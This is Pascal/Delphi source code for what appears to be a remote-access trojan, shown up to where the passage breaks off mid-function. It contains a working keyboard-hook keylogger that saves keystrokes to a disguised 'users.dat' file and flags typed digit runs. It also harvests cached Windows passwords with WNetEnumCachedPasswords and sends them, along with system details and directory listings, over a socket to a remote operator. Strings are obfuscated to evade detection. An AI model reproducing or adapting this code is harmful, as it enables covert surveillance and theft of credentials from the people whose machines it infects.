function WSAAsyncGetHostByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetHostByName';
function WSAAsyncGetProtoByNumber(HWindow: HWND; wMsg: u_int; number: Integer; buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetProtoByNumber';
function WSAAsyncGetProtoByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetProtoByName';
function WSAAsyncGetServByPort( HWindow: HWND; wMsg, port: u_int; proto, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetServByPort';
function WSAAsyncGetServByName(HWindow: HWND; wMsg: u_int; name, proto, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetServByName';
function WSACancelAsyncRequest(hAsyncTaskHandle: THandle): Integer; stdcall; external winsocket name 'WSACancelAsyncRequest';
function WSASetBlockingHook(lpBlockFunc: TFarProc): TFarProc; stdcall; external winsocket name 'WSASetBlockingHook';
function WSAUnhookBlockingHook: Integer; stdcall; external winsocket name 'WSAUnhookBlockingHook';

//function WSAGetLastError: Integer; stdcall; external winsocket name 'WSAGetLastError';
function WSAGetLastError: Integer; stdcall;
type
  TListen = function: Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAGetLastError'));
    if @LListen <> Nil then
      Result := LListen;
    FreeLibrary(h_SOCK_DLL);
  end;
end;

procedure WSASetLastError; stdcall; external winsocket name 'WSASetLastError';
function WSACancelBlockingCall: Integer; stdcall; external winsocket name 'WSACancelBlockingCall';
function WSAIsBlocking: BOOL; stdcall; external winsocket name 'WSAIsBlocking';

//function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; external winsocket name 'WSAStartup';
function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall;
type
  TListen = function(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAStartup'));
    if @LListen <> Nil then
      Result := LListen(wVersionRequired, WSData);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function WSACleanup: Integer; stdcall; external winsocket name 'WSACleanup';
function WSACleanup: Integer; stdcall;
type
  TListen = function: Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSACleanup'));
    if @LListen <> Nil then
      Result := LListen;
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function __WSAFDIsSet(s: TSOcket; var FDSet: TFDSet): Bool; stdcall; external winsocket name '__WSAFDIsSet';
function TransmitFile(hSocket: TSocket; hFile: THandle; nNumberOfBytesToWrite: DWORD; nNumberOfBytesPerSend: DWORD; lpOverlapped: POverlapped; lpTransmitBuffers: PTransmitFileBuffers; dwReserved: DWORD): BOOL; stdcall; external winsocket name 'TransmitFile';
function AcceptEx(sListenSocket, sAcceptSocket: TSocket; lpOutputBuffer: Pointer; dwReceiveDataLength, dwLocalAddressLength, dwRemoteAddressLength: DWORD; var lpdwBytesReceived: DWORD; lpOverlapped: POverlapped): BOOL; stdcall; external winsocket name 'AcceptEx';
procedure GetAcceptExSockaddrs(lpOutputBuffer: Pointer; dwReceiveDataLength, dwLocalAddressLength, dwRemoteAddressLength: DWORD; var LocalSockaddr: TSockAddr; var LocalSockaddrLength: Integer; var RemoteSockaddr: TSockAddr; var RemoteSockaddrLength: Integer); stdcall; external winsocket name 'GetAcceptExSockaddrs';

function WSAMakeSyncReply(Buflen, Error: Word): Longint;
begin
  WSAMakeSyncReply:= MakeLong(Buflen, Error);
end;

function WSAMakeSelectReply(Event, Error: Word): Longint;
begin
  WSAMakeSelectReply:= MakeLong(Event, Error);
end;

function WSAGetAsyncBuflen(Param: Longint): Word;
begin
  WSAGetAsyncBuflen:= LOWORD(Param);
end;

function WSAGetAsyncError(Param: Longint): Word;
begin
  WSAGetAsyncError:= HIWORD(Param);
end;

function WSAGetSelectEvent(Param: Longint): Word;
begin
  WSAGetSelectEvent:= LOWORD(Param);
end;

function WSAGetSelectError(Param: Longint): Word;
begin
  WSAGetSelectError:= HIWORD(Param);
end;

procedure FD_CLR(Socket: TSocket; var FDSet: TFDSet);
var
  I: Integer;
begin
  I := 0;
  while I < FDSet.fd_count do
  begin
    if FDSet.fd_array[I] = Socket then
    begin
      while I < FDSet.fd_count - 1 do
      begin
        FDSet.fd_array[I] := FDSet.fd_array[I + 1];
        Inc(I);
      end;
      Dec(FDSet.fd_count);
      Break;
    end;
    Inc(I);
  end;
end;

function FD_ISSET(Socket: TSocket; var FDSet: TFDSet): Boolean;
begin
  Result := __WSAFDIsSet(Socket, FDSet);
end;

procedure FD_SET(Socket: TSocket; var FDSet: TFDSet);
begin
  if FDSet.fd_count < FD_SETSIZE then
  begin
    FDSet.fd_array[FDSet.fd_count] := Socket;
    Inc(FDSet.fd_count);
  end;
end;

procedure FD_ZERO(var FDSet: TFDSet);
begin
  FDSet.fd_count := 0;
end;

//=== stuff
function IntToStr(A:Integer):string;
begin
  Str(A,Result);
end;

function
StrToInt(const S: string): Integer; var E: Integer; begin Val(S, Result, E); if E <> 0 then E:=0;//ConvertErrorFmt(SInvalidInteger, [S]); end; procedure AppMsg(Ms:PChar); begin MessageBox(Handle,Ms,'Error',0); end; //=== Cleanup and stop the program === procedure ShutDownServer; begin closesocket(Server); WSACleanup; // UnRegisterClass(lpzClassName,hInst); // Halt; end; //=== Process Messages === procedure ProcessMessages; begin while GetMessage(Msg2,0,0,0) do begin TranslateMessage(Msg2); DispatchMessage(Msg2); end; end; //=== Socket things ===== //=== Send a String #0 === procedure TSock.WriteString(wParam:word;Buff:PChar); begin send(wParam,Buff^,Length(Buff),0); end; //=== Send Buffer === function TSock.WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt; begin Result:=send(wParam,Buff^,Len,0); end; //=== Process OnAccept === procedure TSock.OnServerAccept(wParam,lParam:longInt); begin accept(Server,nil,nil); end; //=== Process OnClose === procedure TSock.OnServerClose(wParam,lParam:longInt); begin //nothing end; function GetLocalHostName: string; var szHostName: array[0..128] of char; begin if gethostname(szHostName, 128) = 0 then Result:= szHostName; end; //======= sysutils ========= function StrPas(Str: PChar): string; begin Result := Str; end; function StrLen(Str: PChar): Cardinal; assembler; asm MOV EDX,EDI MOV EDI,EAX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB MOV EAX,0FFFFFFFEH SUB EAX,ECX MOV EDI,EDX end; function StrCopy(Dest, Source: PChar): PChar; assembler; asm PUSH EDI PUSH ESI MOV ESI,EAX MOV EDI,EDX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB NOT ECX MOV EDI,ESI MOV ESI,EDX MOV EDX,ECX MOV EAX,EDI SHR ECX,2 REP MOVSD MOV ECX,EDX AND ECX,3 REP MOVSB POP ESI POP EDI end; function StrScan(Str: PChar; Chr: Char): PChar; assembler; asm PUSH EDI PUSH EAX MOV EDI,Str MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB NOT ECX POP EDI MOV AL,Chr REPNE SCASB MOV EAX,0 JNE @@1 MOV EAX,EDI DEC EAX @@1: POP EDI end; function DiskSize(Drive: Byte): Integer; var RootPath: 
array[0..4] of Char;
  RootPtr: PChar;
  SectorsPerCluster, BytesPerSector, FreeClusters, TotalClusters: Integer;
begin
  RootPtr := nil;
  if Drive > 0 then
  begin
    StrCopy(RootPath, 'A:\');
    RootPath[0] := Char(Drive + $40);
    RootPtr := RootPath;
  end;
  if GetDiskFreeSpace(RootPtr, SectorsPerCluster, BytesPerSector,
    FreeClusters, TotalClusters) then
    Result := SectorsPerCluster * BytesPerSector * TotalClusters
  else
    Result := -1;
end;

function DeleteFile(const FileName: string): Boolean;
begin
  Result := Windows.DeleteFile(PChar(FileName));
end;

function FileAge(const FileName: string): Integer;
var
  Handle: THandle;
  FindData: TWin32FindData;
  LocalFileTime: TFileTime;
begin
  Handle := FindFirstFile(PChar(FileName), FindData);
  if Handle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(Handle);
    if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
    begin
      FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
      if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi,
        LongRec(Result).Lo) then Exit;
    end;
  end;
  Result := -1;
end;

function FileExists(const FileName: string): Boolean;
begin
  Result := FileAge(FileName) <> -1;
end;

function ByteTypeTest(P: PChar; Index: Integer): TMbcsByteType;
begin
  Result := mbSingleByte;
  if (Index = 0) then
  begin
    if P[Index] in LeadBytes then Result := mbLeadByte;
  end
  else
  begin
    if (P[Index-1] in LeadBytes) and (ByteTypeTest(P, Index-1) = mbLeadByte) then
      Result := mbTrailByte
    else if P[Index] in LeadBytes then
      Result := mbLeadByte;
  end;
end;

function ByteType(const S: string; Index: Integer): TMbcsByteType;
begin
  Result := mbSingleByte;
  if SysLocale.FarEast then Result := ByteTypeTest(PChar(S), Index-1);
end;

function LastDelimiter(const Delimiters, S: string): Integer;
var
  P: PChar;
begin
  Result := Length(S);
  P := PChar(Delimiters);
  while Result > 0 do
  begin
    if (S[Result] <> #0) and (StrScan(P, S[Result]) <> nil) then
      if (ByteType(S, Result) = mbTrailByte) then
        Dec(Result)
      else
        Exit;
    Dec(Result);
  end;
end;

function ExtractFilePath(const FileName: string): string;
var
  I: Integer;
begin
  I := LastDelimiter('\:', FileName);
  Result := Copy(FileName, 1, I);
end;

procedure FindClose(var F: TSearchRec);
begin
  if F.FindHandle <> INVALID_HANDLE_VALUE then
    Windows.FindClose(F.FindHandle);
end;

function FindMatchingFile(var F: TSearchRec): Integer;
var
  LocalFileTime: TFileTime;
begin
  with F do
  begin
    while FindData.dwFileAttributes and ExcludeAttr <> 0 do
      if not FindNextFile(FindHandle, FindData) then
      begin
        Result := GetLastError;
        Exit;
      end;
    FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
    FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi, LongRec(Time).Lo);
    Size := FindData.nFileSizeLow;
    Attr := FindData.dwFileAttributes;
    Name := FindData.cFileName;
  end;
  Result := 0;
end;

function FindFirst(const Path: string; Attr: Integer; var F: TSearchRec): Integer;
const
  faSpecial = faHidden or faSysFile or faVolumeID or faDirectory;
begin
  F.ExcludeAttr := not Attr and faSpecial;
  F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
  if F.FindHandle <> INVALID_HANDLE_VALUE then
  begin
    Result := FindMatchingFile(F);
    if Result <> 0 then FindClose(F);
  end
  else
    Result := GetLastError;
end;

function FindNext(var F: TSearchRec): Integer;
begin
  if FindNextFile(F.FindHandle, F.FindData) then
    Result := FindMatchingFile(F)
  else
    Result := GetLastError;
end;

//=== Registry call ================
constructor TRegistry.Create;
begin
  RootKey := HKEY_CURRENT_USER;
  LazyWrite := True;
end;

function DataTypeToRegData(Value: Integer): TRegDataType;
begin
  if Value = REG_SZ then Result := rdString
  else if Value = REG_EXPAND_SZ then Result := rdExpandString
  else if Value = REG_DWORD then Result := rdInteger
  else if Value = REG_BINARY then Result := rdBinary
  else Result := rdUnknown;
end;

function RegDataToDataType(Value: TRegDataType): Integer;
begin
  case Value of
    rdString: Result := REG_SZ;
    rdExpandString: Result := REG_EXPAND_SZ;
    rdInteger: Result := REG_DWORD;
    rdBinary: Result := REG_BINARY;
  else
    Result := REG_NONE;
  end;
end;

function TRegistry.GetDataInfo(const ValueName: string; var Value: TRegDataInfo):boolean;
var
  DataType: Integer;
begin
  FillChar(Value, SizeOf(TRegDataInfo), 0);
  Result := RegQueryValueEx(CurrentKey, PChar(ValueName), nil, @DataType, nil,
    @Value.DataSize) = ERROR_SUCCESS;
  Value.RegData := DataTypeToRegData(DataType);
end;

function TRegistry.GetData(const Name: string; Buffer: Pointer;
  BufSize: Integer; var RegData: TRegDataType): Integer;
var
  DataType: Integer;
begin
  DataType := REG_NONE;
  if RegQueryValueEx(CurrentKey, PChar(Name), nil, @DataType, PByte(Buffer),
    @BufSize) <> ERROR_SUCCESS then
    // raise ERegistryException.CreateFmt(SRegGetDataFailed, [Name]);
    Result := BufSize;
  RegData := DataTypeToRegData(DataType);
end;

procedure TRegistry.PutData(const Name: string; Buffer: Pointer;
  BufSize: Integer; RegData: TRegDataType);
var
  DataType: Integer;
begin
  DataType := RegDataToDataType(RegData);
  if RegSetValueEx(CurrentKey, PChar(Name), 0, DataType, Buffer,
    BufSize) <> ERROR_SUCCESS then
    // raise ERegistryException.CreateFmt(SRegSetDataFailed, [Name]);
end;

function TRegistry.GetDataSize(const ValueName: string): Integer;
var
  Info: TRegDataInfo;
begin
  if GetDataInfo(ValueName, Info) then
    Result := Info.DataSize
  else
    Result := -1;
end;

procedure TRegistry.WriteString(const Name, Value: string);
begin
  PutData(Name, PChar(Value), Length(Value), rdString);
end;

procedure ReadError(const Name: string);
begin
  // raise ERegistryException.CreateFmt(SInvalidRegType, [Name]);
end;

function TRegistry.ReadString(const Name: string): string;
var
  Len: Integer;
  RegData: TRegDataType;
begin
  Len := GetDataSize(Name);
  if Len > 0 then
  begin
    SetString(Result, nil, Len);
    GetData(Name, PChar(Result), Len, RegData);
    if (RegData = rdString) or (RegData = rdExpandString) then
      SetLength(Result, StrLen(PChar(Result)))
    else
      ReadError(Name);
  end
  else
    Result := '';
end;

procedure TRegistry.CloseKey;
begin
  if CurrentKey <> 0 then
  begin
    if LazyWrite then
      RegCloseKey(CurrentKey)
    else
      RegFlushKey(CurrentKey);
    FCurrentKey := 0;
    FCurrentPath := '';
  end;
end;

procedure TRegistry.ChangeKey(Value: HKey; const Path: string);
begin
  CloseKey;
  FCurrentKey := Value;
  FCurrentPath := Path;
end;

procedure TRegistry.SetRootKey(Value: HKEY);
begin
  if RootKey <> Value then
  begin
    if FCloseRootKey then
    begin
      RegCloseKey(RootKey);
      FCloseRootKey := False;
    end;
    FRootKey := Value;
    CloseKey;
  end;
end;

function TRegistry.GetBaseKey(Relative: Boolean): HKey;
begin
  if (CurrentKey = 0) or not Relative then
    Result := RootKey
  else
    Result := CurrentKey;
end;

function IsRelative(const Value: string): Boolean;
begin
  Result := not ((Value <> '') and (Value[1] = '\'));
end;

function TRegistry.OpenKey(const Key: string; CanCreate: Boolean): Boolean;
var
  TempKey: HKey;
  S: string;
  Disposition: Integer;
  Relative: Boolean;
begin
  S := Key;
  Relative := IsRelative(S);
  if not Relative then Delete(S, 1, 1);
  TempKey := 0;
  if not CanCreate or (S = '') then
  begin
    Result := RegOpenKeyEx(GetBaseKey(Relative), PChar(S), 0,
      KEY_ALL_ACCESS, TempKey) = ERROR_SUCCESS;
  end
  else
    Result := RegCreateKeyEx(GetBaseKey(Relative), PChar(S), 0, nil,
      REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nil, TempKey,
      @Disposition) = ERROR_SUCCESS;
  if Result then
  begin
    if (CurrentKey <> 0) and Relative then S := CurrentPath + '\' + S;
    ChangeKey(TempKey, S);
  end;
end;

destructor TRegistry.Destroy;
begin
  CloseKey;
  inherited;
end;

//== Allocate windows ===
const
  InstanceCount = 313;

Type
  TWndMethod = procedure(var Message: TMessage) of object;

type
  PObjectInstance = ^TObjectInstance;
  TObjectInstance = packed record
    Code: Byte;
    Offset: Integer;
    case Integer of
      0: (Next: PObjectInstance);
      1: (Method: TWndMethod);
  end;

type
  PInstanceBlock = ^TInstanceBlock;
  TInstanceBlock = packed record
    Next: PInstanceBlock;
    Code: array[1..2] of Byte;
    WndProcPtr: Pointer;
    Instances: array[0..InstanceCount] of TObjectInstance;
  end;

var
  InstBlockList: PInstanceBlock;
  InstFreeList: PObjectInstance;

function StdWndProc(Window: HWND; Message, WParam: Longint;
  LParam: Longint): Longint; stdcall; assembler;
asm
  XOR EAX,EAX
  PUSH EAX
  PUSH LParam
  PUSH WParam
  PUSH Message
  MOV EDX,ESP
  MOV EAX,[ECX].Longint[4]
  CALL [ECX].Pointer
  ADD ESP,12
  POP EAX
end;

function CalcJmpOffset(Src, Dest: Pointer): Longint;
begin
  Result := Longint(Dest) - (Longint(Src) + 5);
end;

function MakeObjectInstance(Method: TWndMethod): Pointer;
const
  BlockCode: array[1..2] of Byte = (
    $59,  { POP ECX }
    $E9); { JMP StdWndProc }
  PageSize = 4096;
var
  Block: PInstanceBlock;
  Instance: PObjectInstance;
begin
  if InstFreeList = nil then
  begin
    Block := VirtualAlloc(nil, PageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    Block^.Next := InstBlockList;
    Move(BlockCode, Block^.Code, SizeOf(BlockCode));
    Block^.WndProcPtr := Pointer(CalcJmpOffset(@Block^.Code[2], @StdWndProc));
    Instance := @Block^.Instances;
    repeat
      Instance^.Code := $E8; { CALL NEAR PTR Offset }
      Instance^.Offset := CalcJmpOffset(Instance, @Block^.Code);
      Instance^.Next := InstFreeList;
      InstFreeList := Instance;
      Inc(Longint(Instance), SizeOf(TObjectInstance));
    until Longint(Instance) - Longint(Block) >= SizeOf(TInstanceBlock);
    InstBlockList := Block;
  end;
  Result := InstFreeList;
  Instance := InstFreeList;
  InstFreeList := Instance^.Next;
  Instance^.Method := Method;
end;

{ Free an object instance }
procedure FreeObjectInstance(ObjectInstance: Pointer);
begin
  if ObjectInstance <> nil then
  begin
    PObjectInstance(ObjectInstance)^.Next := InstFreeList;
    InstFreeList := ObjectInstance;
  end;
end;

var
  UtilWindowClass: TWndClass = (
    style: 0;
    lpfnWndProc: @DefWindowProc;
    cbClsExtra: 0;
    cbWndExtra: 0;
    hInstance: 0;
    hIcon: 0;
    hCursor: 0;
    hbrBackground: 0;
    lpszMenuName: nil;
    lpszClassName: 'TPUtilWindow');

function AllocateHWnd(Method: TWndMethod): HWND;
var
  TempClass: TWndClass;
  ClassRegistered: Boolean;
begin
  UtilWindowClass.hInstance := HInstance;
  ClassRegistered := GetClassInfo(HInstance, UtilWindowClass.lpszClassName,
    TempClass);
  if not ClassRegistered or
(TempClass.lpfnWndProc <> @DefWindowProc) then begin if ClassRegistered then Windows.UnregisterClass(UtilWindowClass.lpszClassName, HInstance); Windows.RegisterClass(UtilWindowClass); end; Result := CreateWindowEx(WS_EX_TOOLWINDOW, UtilWindowClass.lpszClassName, '', WS_POPUP {!0}, 0, 0, 0, 0, 0, 0, HInstance, nil); if Assigned(Method) then SetWindowLong(Result, GWL_WNDPROC, Longint(MakeObjectInstance(Method))); end; procedure DeallocateHWnd(Wnd: HWND); var Instance: Pointer; begin Instance := Pointer(GetWindowLong(Wnd, GWL_WNDPROC)); DestroyWindow(Wnd); if Instance <> @DefWindowProc then FreeObjectInstance(Instance); end; //==== Key_log========================= type PGlobalDLLData = ^TGlobalDLLData; TGlobalDLLData = record hHookHWnd: HWND; hKeyHook: HHOOK; end; const MMFileName = 'Users'; var MapHandle: THandle; GlobalData: PGlobalDLLData; tt,Logger:string; l:textfile; cc:byte; procedure OpenSharedData; var Size: integer; CreateFileMappingError: integer; begin Size := SizeOf( TGlobalDLLData ); MapHandle := CreateFileMapping( $FFFFFFFF, nil, PAGE_READWRITE, 0, Size, MMFileName ); CreateFileMappingError := GetLastError; if ( MapHandle = 0 ) then exit; GlobalData := MapViewOfFile( MapHandle, FILE_MAP_ALL_ACCESS, 0, 0, Size ); if ( GlobalData = nil ) then begin CloseHandle( MapHandle ); exit; end; if ( ( MapHandle <> 0 ) and ( CreateFileMappingError <> ERROR_ALREADY_EXISTS ) ) then begin GlobalData^.hHookHWnd := 0; GlobalData^.hKeyHook := 0; end; end; procedure CloseSharedData; begin UnmapViewOfFile( GlobalData ); CloseHandle( MapHandle ); end; //function KeyCounter( code: integer; wParam: integer; lParam: integer ): lRESULT stdcall; function KeyCounter( code: integer; wParam: integer; lParam: integer ): LRESULT; stdcall; begin OpenSharedData; Result := CallNextHookEx( GlobalData^.hKeyHook, Code, wParam, lParam ); if ( code = HC_ACTION ) then begin if ( lParam > 0 ) then begin PostMessage( GlobalData^.hHookHWnd, UM_KEYHIT, wParam, 0 ); end; Result := 0; exit; end; end; 
procedure KeyHook_Start( hWin: HWND ); //stdcall; begin OpenSharedData; GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, KeyCounter, hInstance, 0 ); GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, nil, hInstance, 0 ); GlobalData^.hHookHWnd := hWin; end; procedure KeyHook_Stop; //stdcall; begin OpenSharedData; UnHookWindowsHookEx( GlobalData^.hKeyHook ); CloseSharedData; end; procedure TLog.KeyIncrement( var Msg: TMessage ); const lettres: array[65..90] of Char = 'abcdefghijklmnopqrstuvwxyz'; chiffres: array[96..111] of Char = '0123456789*+ - /'; chiffres2: array[48..57] of Char = '0123456789'; var k:integer; s:string; begin k:=msg.WParam; //writeln(inttostr(k)+' : '+char(k)); if k in [96..111] then s:=chiffres[k] else if k in [65..90] then s:=lettres[k] else if k in [48..57] then s:=chiffres2[k] else if k in [112..123] then s:=#255 else if k in [33..40] then s:=#255 else if k = 0 then s:=#255 else if k > 255 then s:=#255 else if k = 16 then s:=crypt('=QKMCR9') else //<SHIFT> if k = 17 then s:=crypt('=AWVI8') else //<CTRL> if k = 18 then s:=crypt('=COP;') else //<ALT> if k = 20 then s:=crypt('=ABTV8') else //<CAPS> if k = 144 then s:=crypt('=LVI;') else //<NUM> if k = 9 then s:=crypt('=vbf;') else //<tab> if k = 8 then s:=crypt('=<') else //<> if k = 223 then s:='!' else if k = 219 then s:=')' else if k = 187 then s:='=' else if k = 221 then s:='^' else if k = 186 then s:='$' else if k = 192 then s:='? else if k = 220 then s:='*' else if k = 188 then s:=',' else if k = 190 then s:=';' else if k = 191 then s:=':' else if k = 226 then s:='<' else if k = 222 then s:='? else if k = 13 then s:='? 
else if k = 32 then s:=' ' else if k = 46 then s:=crypt('=ffh;') else //<del> if k = 45 then s:=crypt('=kmw;') else //<ins> s:='['+inttostr(k)+']'; logger:=logger+s; //write(s); if (s[1] in ['0'..'9']) or (s[1]=' ') or (s[1]='-') then inc(cc) else cc:=0; if (cc=13) then begin cc:=0; Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); Registre.WriteString('1','1'); Registre.Free; end; if length(logger)>200 then begin if not fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat rewrite(l); write(l,' '); closefile(l); end; assignfile(l,systemdir+crypt(']wpawu)lh~'));//\users.dat reset(l); append(l); write(l,logger); closefile(l); logger:=''; end; end; procedure TLog.LogCreate; var tyhwnd:thandle; begin cc:=0; tyhwnd := AllocateHwnd(KLog.KeyIncrement); KeyHook_Start(tyhwnd); end; procedure TLog.LogDestroy; begin KeyHook_Stop; {$I-} assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(l); append(l); write(l,logger); closefile(l); logger:=''; {$I+} end; //=== password connection function EnumPasswordCallbackProc(pce: TPPasswordCacheEntry; pdw: cardinal) : LongBool; stdcall; var s1 : string; s2 : string; begin result:=true; SetLength(s1,pce^.cbResource); Move(pce^.abResource[0],pointer(s1)^,pce^.cbResource); s1:=pchar(s1); SetLength(s2,pce^.cbPassword); Move(pce^.abResource[pce^.cbResource],pointer(s2)^,pce^.cbPassword); s2:=pchar(s2); write(t,PChar(s1+' : '+s2+#13+#10)); end; procedure testEnumCachedPasswords; var WNetEnumCachedPasswords : function (ps: pchar; pw: word; pb: byte; proc: pointer; bdw: cardinal) : word; stdcall; mpr : cardinal; begin mpr:=LoadLibrary('mpr'); if mpr<>0 then try WNetEnumCachedPasswords:=GetProcAddress(mpr,pchar(crypt('VLfp@hreJkhdhj_qbad{grd'))); //WNetEnumCachedPasswords if @WNetEnumCachedPasswords<>nil then begin try WNetEnumCachedPasswords(nil,0,$FF,@EnumPasswordCallbackProc,0); finally end; end; finally 
FreeLibrary(mpr) end; end; //===windows_control procedure killprocess(prname:string); var str : pchar; h:hwnd; begin str:=@(prname)[1]; h := FindWindow(nil,str); if h <> 0 then PostMessage(h, WM_QUIT, 0, 0); end; {function childproc(h:HWND):bool;stdcall; var tempstring: array [0..255] of char; begin GetClassName(h,classe,255); if (classe=nil) or (classe=string(' ')) then exit; if classe='Edit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; if classe='TEdit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; end; function AddTopLevelWindowsToList2(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin counter:=0; if pos('Netscape',klasse)<>0 then counter:=1; //+ ' (' + inttostr(h) if pos('Explorer',klasse)<>0 then counter:=1; //writeln(string(klasse)); if pos('Opera',klasse)<>0 then counter:=1; end; end; if counter=1 then EnumChildWindows(h,@childproc,8); end; } function AddTopLevelWindowsToList(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin write(t,string(klasse)+#13+#10); end; end; end; //=== information === procedure DoPassword(wParam:longInt); var pp:string; sock:tsock; begin assignfile(t,windowsdir+'~tmp..sys'); rewrite(t); append(t); testEnumCachedPasswords; closefile(t); assignfile(t,windowsdir+'~tmp..sys'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, PChar(pp+#13+#10)); sleep(Timeout); until pp=''; closefile(t); erase(t); end; procedure DoAbout(wParam:longInt); var SI:TSystemInfo; OsVer:TOSVersionInfoA; MS:TMemoryStatus; pp:string; begin ZeroMemory(@OsVer,SizeOf(OsVer)); ZeroMemory(@Si,SizeOf(Si)); 
ZeroMemory(@MS,SizeOf(MS)); MS.dwLength:=SizeOf(MS); OsVer.dwOSVersionInfoSize:=SizeOf(OsVer); GetVersionEx(OsVer); GetSystemInfo(Si); GlobalMemoryStatus(MS); case Win32Platform of WINDOWS.VER_PLATFORM_WIN32_WINDOWS : pp:='95'; WINDOWS.VER_PLATFORM_WIN32s : pp:='32'; WINDOWS.VER_PLATFORM_WIN32_NT : pp:='NT'; end; Sock.WriteString(wParam, PChar( crypt('R{pp`k=')+#13+#10+ //System: WSD.szDescription+#13+#10+ crypt('NQ9$')+IntToStr(OsVer.dwMajorVersion)+'.'+IntToStr(OsVer.dwMinorVersion)+#13+#10+ //OS: crypt('own$FVR2)')+IntToStr(Si.dwNumberOfProcessors)+#13+#10+ //num CPU: crypt('BRV$')+IntToStr(Si.dwProcessorType)+#13+#10+ //CPU crypt('SCN$')+IntToStr(Round(MS.dwTotalPhys/1048576))+#13+#10+ //RAM crypt('GpfaWGJ(')+IntToStr(Round(MS.dwAvailPhys/1024))+#13+#10+ //FreeRAM crypt('Wpw$')+IntToStr(Round(MS.dwTotalVirtual/1048576))+#13+#10+ //Vrt crypt('GpfaSts(')+IntToStr(Round(MS.dwAvailVirtual/1048576))+#13+#10+ //FreeVrt crypt('R{pp`k=(')+systemdir+'\'+#13+#10+ //System: crypt('Vkm`jq=(')+windowsdir+'\'+#13+#10+ //Window: WSD.szSystemStatus+' '+pp+#13+#10+ crypt('Impp?&')+getlocalhostname+#13+#10)); //Host: end; procedure DoShowDirectory(wParam:longInt;command:String); var sss,NomDuDossier,DossierTrouve,FichierTrouve:string; attributs,Resultat:Integer; SearchRec:TSearchRec; TailleDuFichier:integer; begin attributs:=6; sock.writestring(wParam,pchar(crypt('EkqWfgi2')+#13+#10)); //DirScan: sleep(timeout); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+'*.*',FaDirectory,SearchRec); while Resultat=0 do begin if (SearchRec.Name<>'.') and (SearchRec.Name<>'..') and ((SearchRec.Attr and faDirectory)>0) then begin DossierTrouve:=command+'\'+SearchRec.Name; NomDuDossier:=DossierTrouve; // ProcessMessages; end; if NomDuDossier<>sss then begin sleep(timeout); if NomDuDossier<>'' then NomduDossier:=NomDuDossier+'\'; sock.writestring(wParam,pchar(crypt('}F9')+NomduDossier+#13+#10)); //|D: end; sss:=NomDuDossier; 
